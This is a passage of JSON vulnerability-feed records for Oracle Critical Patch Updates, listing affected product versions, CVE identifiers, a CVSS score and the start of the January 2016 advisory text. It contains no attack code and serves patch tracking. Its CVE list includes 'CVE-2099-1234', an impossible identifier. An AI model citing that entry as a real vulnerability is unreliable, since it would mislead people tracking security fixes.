"le"}, {"name": "Oracle Shipping Execution", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Shipping Execution", "version": "12.1.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.7.14", "operator": "le"}, {"name": "Oracle Platform Security for Java", "version": "12.2.1.0.0", "operator": "le"}, {"name": "Oracle Platform Security for Java", "version": "12.2.1.1.0", "operator": "le"}, {"name": "Oracle FLEXCUBE Private Banking", "version": "12.0.1", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "2.1.1", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.3", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.1.3", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.1.3", "operator": "le"}, {"name": "Siebel Apps - Customer Order Management", "version": "16.1", "operator": "le"}, {"name": "Oracle Commerce Guided Search", "version": "6.4.1.2", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "6.4.1.2", "operator": "le"}, {"name": "Primavera P6 Professional Project Management", "version": "8.3", "operator": "le"}, {"name": "Oracle Shipping Execution", "version": "12.1.2", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "12.2.1.0.0", "operator": "le"}, {"name": "Oracle iRecruitment", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "12.1.1.0.0", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.55", "operator": "le"}, {"name": "Secure Global Desktop", "version": "5.2", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.52", "operator": "le"}, {"name": "Oracle Advanced Supply Chain Planning", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "6.3.0", "operator": "le"}, {"name": "Oracle Retail Clearance Optimization Engine", "version": "13.3", "operator": "le"}, {"name": "Oracle Secure Backup", "version": "12.1.0.2.0", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.30", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.32", "operator": "le"}, {"name": "Oracle Data Integrator", "version": "12.1.3.0.0", "operator": "le"}, {"name": "Oracle iStore", "version": "12.2.4", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.1.0", "operator": "le"}, {"name": "Oracle FLEXCUBE Private Banking", "version": "12.1.0", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.6", "operator": "le"}, {"name": "Oracle Application Express", "version": "5.0.4.00.07", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.2", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "6u121", "operator": "le"}, {"name": "Oracle Advanced Pricing", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Advanced Pricing", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.1.1", "operator": "le"}, {"name": "JD Edwards World Security", "version": "9.4", "operator": "le"}, {"name": "Oracle iPlanet Web Proxy Server", "version": "4.0", "operator": "le"}, {"name": "Oracle Financial Services Analytical Applications Infrastructure", "version": "7.3.0", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.3", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "6.5.2", "operator": "le"}, {"name": "Oracle Email Center", "version": "12.2.3", "operator": "le"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "16.x", "operator": "le"}, {"name": "Oracle Retail Xstore Payment", "version": "1.x", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "14.0", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.51", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Email Center", "version": "12.1.1", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Advanced Pricing", "version": "12.2.4", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "11.4.0", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.2.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.33", "operator": "le"}, {"name": "Oracle Financial Services Analytical Applications Infrastructure", "version": "7.3.2", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.2.1.0", "operator": "le"}, {"name": "RDBMS Programmable Interface", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Email Center", "version": "12.2.6", "operator": "le"}, {"name": "Oracle iRecruitment", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Communications Policy Management", "version": "9.7.3", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "11.2", "operator": "le"}, {"name": "RDBMS Programmable Interface", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle iStore", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "6.5.1", "operator": "le"}, {"name": "Oracle FLEXCUBE Private Banking", "version": "12.0.2", "operator": "le"}, {"name": "Oracle iStore", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.5", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.2.0", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle One-to-One Fulfillment", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "3.1.1", "operator": "le"}, {"name": "Secure Global Desktop", "version": "4.7", "operator": "le"}, {"name": "Oracle Agile Engineering Data Management", "version": "6.2.0.0", "operator": "le"}, {"name": "Oracle Retail Returns Management", "version": "13.3", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "3.1.2", "operator": "le"}, {"name": "Solaris Cluster", "version": "4.3", "operator": "le"}, {"name": "Oracle One-to-One Fulfillment", "version": "12.2.5", "operator": "le"}, {"name": "Oracle FLEXCUBE Private Banking", "version": "12.0.0", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "le"}, {"name": "Oracle Retail Clearance Optimization Engine", "version": "13.4", "operator": "le"}, {"name": "JD Edwards EnterpriseOne Tools", "version": "9.1", "operator": "le"}, {"name": "Oracle Commerce Service Center", "version": "10.0.3.5", "operator": "le"}, {"name": "Oracle Advanced Supply Chain Planning", "version": "12.2.5", "operator": "le"}, {"name": "RDBMS Security and SQL*Plus", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Web Services", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.6", "operator": "le"}, {"name": "Oracle iProcurement", "version": "12.2.4", "operator": "le"}, {"name": "RDBMS Security and SQL*Plus", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle FLEXCUBE Enterprise Limits and Collateral Management", "version": "12.0.0", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "14.1", "operator": "le"}, {"name": "Oracle Web Services", "version": "12.2.1.0.0", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.4", "operator": "le"}, {"name": "Java SE", "version": "6u121", "operator": "le"}, {"name": "Siebel UI Framework", "version": "16.1", "operator": "le"}, {"name": "Oracle Shipping Execution", "version": "12.2.3", "operator": "le"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "8.4", "operator": "le"}, {"name": "Oracle Retail Clearance Optimization Engine", "version": "14.0", "operator": "le"}, {"name": "Oracle Application Testing Suite", "version": "12.5.0.3", "operator": "le"}, {"name": "Enterprise Manager", "version": "12.2.2", "operator": "le"}, {"name": "Oracle iRecruitment", "version": "12.1.2", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "12.2.1.2.0", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "5.0.28", "operator": "le"}, {"name": "Oracle FLEXCUBE Private Banking", "version": "2.2.0", "operator": "le"}, {"name": "Oracle Interaction Center Intelligence", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Enterprise Communications Broker", "version": "2.0.0m4p5", "operator": "le"}, {"name": "Oracle Commerce Guided Search", "version": "6.5.2", "operator": "le"}, {"name": "Solaris", "version": "10", "operator": "le"}, {"name": "Enterprise Manager", "version": "12.3.2", "operator": "le"}, {"name": "Oracle Advanced Pricing", "version": "12.2.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.7.13", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "6.5.0", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.1.3", "operator": "le"}, {"name": "Oracle FLEXCUBE Private Banking", "version": "2.0.1", "operator": "le"}, {"name": "Oracle iProcurement", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Hospitality OPERA 5 Property Services", "version": "5.4.0.0", "operator": "le"}, {"name": "Oracle FLEXCUBE Private Banking", "version": "2.0.0", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.4.0", "operator": "le"}, {"name": "Oracle FLEXCUBE Investor Servicing", "version": "12.0.1", "operator": "le"}, {"name": "MICROS XBR", "version": "7.0.4", "operator": "le"}, {"name": "Oracle Interaction Center Intelligence", "version": "12.1.3", "operator": "le"}, {"name": "Oracle iRecruitment", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Agile Product Lifecycle Management for Process", "version": "6.2.0.0", "operator": "le"}, {"name": "Oracle Email Center", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Hospitality OPERA 5 Property Services", "version": "5.5.0.0", "operator": "le"}, {"name": "Oracle Big Data Discovery", "version": "1.2.0", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "6.2.2", "operator": "le"}, {"name": "Kernel PDB", "version": "12.1.0.2", "operator": "le"}, {"name": "Java SE", "version": "8u102", "operator": "le"}, {"name": "Oracle Hospitality OPERA 5 Property Services", "version": "5.5.1.0", "operator": "le"}, {"name": "Oracle iProcurement", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Application Testing Suite", "version": "12.5.0.2", "operator": "le"}, {"name": "Oracle Data Integrator", "version": "12.1.2.0.0", "operator": "le"}, {"name": "BI Publisher (formerly XML Publisher)", "version": "11.1.1.7.0", "operator": "le"}, {"name": "OJVM", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Shipping Execution", "version": "12.2.4", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.87.1", "operator": "le"}, {"name": "Oracle Platform Security for Java", "version": "12.1.3.0.0", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "11.0", "operator": "le"}, {"name": "Oracle iProcurement", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Commerce Platform", "version": "10.0.3.5", "operator": "le"}, {"name": "Oracle Data Integrator", "version": "11.1.1.9.0", "operator": "le"}, {"name": "PeopleSoft Enterprise SCM Services Procurement", "version": "9.2", "operator": "le"}, {"name": "Oracle Email Center", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.4", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.2", "operator": "le"}, {"name": "NetBeans", "version": "8.1", "operator": "le"}, {"name": "Primavera P6 Professional Project Management", "version": "15.x", "operator": "le"}, {"name": "Oracle Advanced Supply Chain Planning", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Commerce Platform", "version": "10.2.0.5", "operator": "le"}, {"name": "Oracle Financial Services Analytical Applications Infrastructure", "version": "8.0.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.3", "operator": "le"}, {"name": "Oracle Retail Returns Management", "version": "14.0", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "11.3.0", "operator": "le"}, {"name": "Oracle Financial Services Analytical Applications Infrastructure", "version": "7.3.5", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "12.2.1.1.0", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "12.2.1.1.0", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.2.5", "operator": "le"}, {"name": "Oracle FLEXCUBE Enterprise Limits and Collateral Management", "version": "12.1.0", "operator": "le"}, {"name": "Oracle Email Center", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Commerce Platform", "version": "11.2.0.1", "operator": "le"}, {"name": "Oracle Advanced Pricing", "version": "12.2.6", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.0.1", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Shipping Execution", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Discoverer", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle Advanced Pricing", "version": "12.1.3", "operator": "le"}, {"name": "Oracle One-to-One Fulfillment", "version": "12.2.6", "operator": "le"}, {"name": "PeopleSoft Enterprise SCM Services Procurement", "version": "9.1", "operator": "le"}, {"name": "RDBMS Security", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.87.2", "operator": "le"}, {"name": "Oracle Financial Services Analytical Applications Infrastructure", "version": "8.0.1", "operator": "le"}, {"name": "Oracle Interaction Center Intelligence", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Agile Product Lifecycle Management for Process", "version": "6.1.0.4", "operator": "le"}, {"name": "Oracle Commerce Guided Search", "version": "6.2.2", "operator": "le"}, {"name": "BI Publisher (formerly XML Publisher)", "version": "12.2.1.0.0", "operator": "le"}, {"name": "Oracle FLEXCUBE Private Banking", "version": "12.0.3", "operator": "le"}, {"name": "Oracle Web Services", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle Big Data Discovery", "version": "1.1.1", "operator": "le"}, {"name": "Sun Ray Operating Software", "version": "11.1.7", "operator": "le"}, {"name": "Oracle Commerce Guided Search", "version": "6.5.0", "operator": "le"}, {"name": "Sun ZFS Storage Appliance Kit (AK)", "version": "2013", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.5", "operator": "le"}, {"name": "Oracle Retail Clearance Optimization Engine", "version": "13.2", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.2.1.1", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "14.0", "operator": "le"}, {"name": "Primavera P6 Enterprise Project Portfolio Management", "version": "15.x", "operator": "le"}, {"name": "Oracle Hospitality OPERA 5 Property Services", "version": "5.4.1.0", "operator": "le"}, {"name": "Oracle Commerce Service Center", "version": "10.2.0.5", "operator": "le"}, {"name": "Oracle Agile Engineering Data Management", "version": "6.1.3.0", "operator": "le"}, {"name": "Oracle Enterprise Session Border Controller", "version": "7.3m1p4", "operator": "le"}, {"name": "MySQL Server", "version": "5.7.12", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle Data Integrator", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle Agile Product Lifecycle Management for Process", "version": "6.1.1.6", "operator": "le"}, {"name": "PeopleSoft Enterprise HCM", "version": "9.2", "operator": "le"}, {"name": "Oracle Financial Services Analytical Applications Infrastructure", "version": "7.3.4", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.1", "operator": "le"}, {"name": "MySQL Connector", "version": "2.0.4", "operator": "le"}, {"name": "Oracle iProcurement", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Hospitality OPERA 5 Property Services", "version": "5.4.2.0", "operator": "le"}, {"name": "Oracle Web Services", "version": "12.1.3.0.0", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.3.6.0", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.0.1", "operator": "le"}, {"name": "Oracle iStore", "version": "12.1.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "5.1.4", "operator": "le"}, {"name": "Oracle Banking Digital Experience", "version": "15.1", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.50", "operator": "le"}, {"name": "Oracle iProcurement", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.1", "operator": "le"}, {"name": "Oracle Retail Customer Insights", "version": "15.0", "operator": "le"}, {"name": "Oracle Retail Central Office", "version": "13.0", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.0.2", "operator": "le"}, {"name": "Oracle Communications Policy Management", "version": "12.1.1", "operator": "le"}, {"name": "Oracle iStore", "version": "12.1.1", "operator": "le"}, {"name": "MySQL Server", "version": "5.7.15", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.0", "operator": "le"}, {"name": "Oracle Communications Policy Management", "version": "10.4.1", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.5", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.2", "operator": "le"}, {"name": "Solaris Cluster", "version": "3.3", "operator": "le"}, {"name": "Oracle Insurance IStream", "version": "4.3.2", "operator": "le"}, {"name": "Oracle Life Sciences Data Hub", "version": "2.x", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.1", "operator": "le"}, {"name": "Oracle iPlanet Web Server", "version": "7.0", "operator": "le"}, {"name": "Oracle Advanced Pricing", "version": "12.2.5", "operator": "le"}, {"name": "Oracle FLEXCUBE Universal Banking", "version": "12.0.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.7", "operator": "le"}, {"name": "Oracle Big Data Discovery", "version": "1.1.3", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.6", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "5.0", "operator": "le"}, {"name": "MICROS XBR", "version": "7.0.2", "operator": "le"}, {"name": "Oracle FLEXCUBE Core Banking", "version": "11.6.0.0.0", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.5.3", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.1.3", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "5.1.8", "operator": "le"}, {"name": "Oracle Commerce Guided Search", "version": "6.5.1", "operator": "le"}, {"name": "Big Data Graph", "version": "1.2", "operator": "le"}, {"name": "Oracle Retail Merchandising Insights", "version": "15.0", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Financial Services Analytical Applications Infrastructure", "version": "7.3.1", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "7.0", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Commerce Guided Search", "version": "6.3.0", "operator": "le"}, {"name": "Oracle One-to-One Fulfillment", "version": "12.1.1", "operator": "le"}, {"name": "Oracle One-to-One Fulfillment", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Retail Returns Management", "version": "13.2", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "7.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "8u102", "operator": "le"}, {"name": "Oracle Retail Xstore Point of Service", "version": "5.5", "operator": "le"}, {"name": "Oracle Common Applications Calendar", "version": "12.2.6", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.1.2", "operator": "le"}, {"name": "Solaris", "version": "11.3", "operator": "le"}, {"name": "Oracle Retail Back Office", "version": "13.4", "operator": "le"}, {"name": "Oracle Commerce Guided Search / Oracle Commerce Experience Manager", "version": "11.1", "operator": "le"}, {"name": "Oracle One-to-One Fulfillment", "version": "12.1.2", "operator": "le"}, {"name": "Oracle One-to-One Fulfillment", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Financial Services Analytical Applications Infrastructure", "version": "8.0.2", "operator": "le"}, {"name": "Oracle Data Integrator", "version": "12.2.1.1.0", "operator": "le"}, {"name": "Enterprise Manager", "version": "12.1.4", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.2", "operator": "le"}], "cvelist": ["CVE-2016-5606", "CVE-2016-5540", "CVE-2016-5630", "CVE-2016-5594", "CVE-2016-5575", "CVE-2016-5609", "CVE-2015-5351", "CVE-2016-8294", "CVE-2016-5565", "CVE-2016-5591", "CVE-2015-1792", "CVE-2016-5498", "CVE-2016-5624", "CVE-2016-5555", "CVE-2014-9296", "CVE-2015-0235", "CVE-2015-1793", "CVE-2016-1546", "CVE-2016-5560", "CVE-2016-5611", "CVE-2014-7809", "CVE-2016-3492", "CVE-2016-5612", "CVE-2015-3197", "CVE-2016-5602", "CVE-2016-5487", "CVE-2016-5505", "CVE-2016-5608", "CVE-2016-5625", "CVE-2016-6306", "CVE-2016-5619", "CVE-2016-5568", "CVE-2016-6663", "CVE-2015-1789", "CVE-2016-5527", "CVE-2016-2183", "CVE-2014-0227", "CVE-2016-5481", "CVE-2016-5518", "CVE-2016-8281", "CVE-2016-5631", "CVE-2015-0286", "CVE-2016-2178", "CVE-2016-8288", "CVE-2016-5635", "CVE-2016-5497", "CVE-2015-2568", "CVE-2016-5486", "CVE-2016-5628", "CVE-2015-3195", "CVE-2016-4979", "CVE-2016-5617", "CVE-2016-5621", "CVE-2016-3473", "CVE-2016-5521", "CVE-2016-5543", "CVE-2016-5585", "CVE-2016-5488", "CVE-2016-0714", "CVE-2014-3571", "CVE-2016-8292", "CVE-2016-5588", "CVE-2016-5559", "CVE-2016-5599", "CVE-2016-5539", "CVE-2016-5514", "CVE-2016-5479", "CVE-2016-6302", "CVE-2016-5504", "CVE-2016-6664", "CVE-2016-3551", "CVE-2016-5499", "CVE-2016-2177", "CVE-2016-5604", "CVE-2016-5574", "CVE-2014-9294", "CVE-2010-5312", "CVE-2014-0224", "CVE-2016-5616", "CVE-2016-8296", "CVE-2016-0635", "CVE-2016-2105", "CVE-2016-5557", "CVE-2016-5569", "CVE-2016-2107", "CVE-2016-5553", "CVE-2015-7501", "CVE-2016-5610", "CVE-2016-5577", "CVE-2015-3253", "CVE-2014-9295", "CVE-2016-6307", "CVE-2016-3562", "CVE-2016-1182", "CVE-2016-5566", "CVE-2016-5576", "CVE-2016-5582", "CVE-2016-0763", "CVE-2016-5493", "CVE-2016-5615", "CVE-2016-8285", "CVE-2016-6308", "CVE-2016-5633", "CVE-2016-2180", "CVE-2016-5534", "CVE-2016-5542", "CVE-2016-5513", "CVE-2016-5571", "CVE-2016-5567", "CVE-2016-5597", "CVE-2016-5525", "CVE-2016-8295", "CVE-2014-0099", "CVE-2016-5627", "CVE-2014-2532", "CVE-2016-5500", "CVE-2016-8287", "CVE-2016-2109", "CVE-2016-3505", "CVE-2016-2181", "CVE-2014-0119", "CVE-2016-6304", "CVE-2016-5482", "CVE-2016-5522", "CVE-2014-0114", "CVE-2016-5529", "CVE-2013-4322", "CVE-2016-5515", "CVE-2016-6662", "CVE-2014-0050", "CVE-2016-5595", "CVE-2013-2067", "CVE-2015-0500", "CVE-2016-5596", "CVE-2013-4286", "CVE-2016-1881", "CVE-2015-0382", "CVE-2099-1234", "CVE-2016-5587", "CVE-2016-5480", "CVE-2016-5600", "CVE-2016-5491", "CVE-2016-5586", "CVE-2016-5519", "CVE-2016-5605", "CVE-2015-1788", "CVE-2016-5632", "CVE-2016-5511", "CVE-2016-5578", "CVE-2016-5562", "CVE-2016-5489", "CVE-2016-7052", "CVE-2016-5490", "CVE-2016-5533", "CVE-2013-4590", "CVE-2016-5626", "CVE-2016-5583", "CVE-2016-5556", "CVE-2016-1950", "CVE-2016-5607", "CVE-2016-8291", "CVE-2016-0706", "CVE-2016-5492", "CVE-2012-1007", "CVE-2016-5570", "CVE-2016-5516", "CVE-2016-8283", "CVE-2016-5507", "CVE-2016-5537", "CVE-2016-5584", "CVE-2016-5598", "CVE-2015-0409", "CVE-2016-1181", "CVE-2013-2566", "CVE-2015-0423", "CVE-2014-0096", "CVE-2016-5508", "CVE-2016-2176", "CVE-2016-5524", "CVE-2015-1790", "CVE-2016-5510", "CVE-2014-0075", "CVE-2013-4444", "CVE-2016-6305", "CVE-2016-5530", "CVE-2016-5580", "CVE-2016-6303", "CVE-2016-5538", "CVE-2015-1351", "CVE-2016-5523", "CVE-2016-5613", "CVE-2016-5618", "CVE-2016-5601", "CVE-2016-2182", "CVE-2016-5554", "CVE-2016-5535", "CVE-2015-0433", "CVE-2016-8293", "CVE-2016-5589", "CVE-2016-5581", "CVE-2016-5531", "CVE-2016-5620", "CVE-2016-5495", "CVE-2016-5573", "CVE-2016-5564", "CVE-2016-5592", "CVE-2016-5532", "CVE-2015-7940", "CVE-2016-5526", "CVE-2016-5603", "CVE-2016-5517", "CVE-2016-5501", "CVE-2016-5502", "CVE-2016-5634", "CVE-2016-5512", "CVE-2016-5579", "CVE-2016-5561", "CVE-2016-8284", "CVE-2016-5593", "CVE-2016-8290", "CVE-2016-3081", "CVE-2016-2179", "CVE-2016-5503", "CVE-2016-2106", "CVE-2016-7440", "CVE-2016-5558", "CVE-2015-4852", "CVE-2014-9293", "CVE-2016-5536", "CVE-2015-1791", "CVE-2016-5563", "CVE-2016-8289", "CVE-2016-8286", "CVE-2016-6309", "CVE-2016-5572", "CVE-2016-5622", "CVE-2016-5629", "CVE-2016-5506", "CVE-2016-3495", "CVE-2016-5544", "CVE-2015-0411", "CVE-2015-0381"], "modified": "2016-11-21T00:00:00", "id": "ORACLE:CPUOCT2016-2881722", "href": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T04:13:44", "references": [], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n \n\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\n \n\n\nThis Critical Patch Update contains 248 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n \n\n\n** Please note that on November 10, 2015, Oracle released [Security Alert for CVE-2015-4852](<http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html>). Customers of affected Oracle products are strongly advised to apply the fixes and/or configuration steps that were announced for CVE-2015-4852. **\n\n \n\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n\n \n\n", "edition": 3, "reporter": "Oracle", "published": "2016-01-19T00:00:00", "title": "Oracle Critical Patch Update - January 2016", "type": "oracle", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Oracle CRM Technical Foundation", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Endeca Server", "version": "7.3.0.0", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.3", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "7.6.2", "operator": "le"}, {"name": "Oracle BI Publisher", "version": "11.1.1.9.0", "operator": "le"}, {"name": "Oracle Retail Order Broker Cloud Service", "version": "4.0", "operator": "le"}, {"name": "Oracle iLearning", "version": "6.1", "operator": "le"}, {"name": "Oracle Common Applications", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Outside In Technology", "version": "8.5.1", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Service Contracts", "version": "12.1.3", "operator": "le"}, {"name": "XDB - XML Database", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle WebCenter Sites", "version": "11.1.1.8.0", "operator": "le"}, {"name": "Oracle Configurator", "version": "12.2", "operator": "le"}, {"name": "Java SE, Java SE Embedded", "version": "7u91", "operator": "le"}, {"name": "Oracle Interaction Blending", "version": "12.1.1", "operator": "le"}, {"name": "Solaris Cluster", "version": "4.2", "operator": "le"}, {"name": "MICROS CWDirect", "version": "13.0", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.27", "operator": "le"}, {"name": "Oracle Advanced Collections", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Field Service", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Communications Converged Application Server - Service Controller", "version": "6.1", "operator": "le"}, {"name": "Oracle Email Center", "version": "12.1.3", "operator": "le"}, {"name": "PeopleSoft Enterprise SCM Order Management", "version": "9.1", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.3", "operator": "le"}, {"name": "Oracle CRM Technical Foundation", "version": "12.2.5", "operator": "le"}, {"name": "Oracle Configurator", "version": "12.1", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.46", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.3", "operator": "le"}, {"name": "Solaris Cluster", "version": "4", "operator": "le"}, {"name": "Oracle Retail Order Broker Cloud Service", "version": "4.1.", "operator": "le"}, {"name": 